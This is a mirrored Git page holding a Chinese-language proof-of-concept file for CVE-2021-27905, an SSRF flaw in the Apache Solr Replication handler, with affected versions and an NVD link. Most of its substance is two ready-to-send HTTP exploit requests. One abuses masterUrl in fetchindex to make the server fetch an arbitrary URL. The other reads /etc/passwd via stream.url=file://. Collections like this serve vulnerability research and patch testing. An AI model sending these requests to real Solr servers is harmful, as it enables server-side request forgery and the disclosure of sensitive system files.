admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 03:17:19 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web服务器漏洞/Apache Solr Replication handler SSRF CVE-2021-27905.md
Threekiii 190c8e74dc 更新漏洞
2023-07-11 10:57:15 +08:00

34 lines
891 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Apache Solr Replication handler SSRF CVE-2021-27905
## 漏洞描述
Apache Solr是一个开源搜索服务引擎Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。漏洞产生在 ReplicationHandler 中的 masterUrl 参数( leaderUrl 参数)可指派另一个 Solr 核心上的 ReplicationHandler 讲索引数据复制到本地核心上。成功利用此漏洞可造成服务端请求伪造漏洞。
参考链接:
* https://nvd.nist.gov/vuln/detail/CVE-2021-27905
## 漏洞影响
```
Apache Solr 7.0.0 - 7.7.3
Apache Solr 8.0.0 - 8.8.1
```
### 漏洞复现
poc
```
GET /solr/test/replication?command=fetchindex&masterUrl=http://127.0.0.1/&wt=json&httpBasicAuthUser=&httpBasicAuthPassword= HTTP/1.1
HOST:target
....
```
```
GET http://xxxxx/solr/xxxx/debug/dump?stream.url=file:///etc/passwd&param=ContentStream HTTP/1.1
HOST:target
...
```
Reference in New Issue View Git Blame Copy Permalink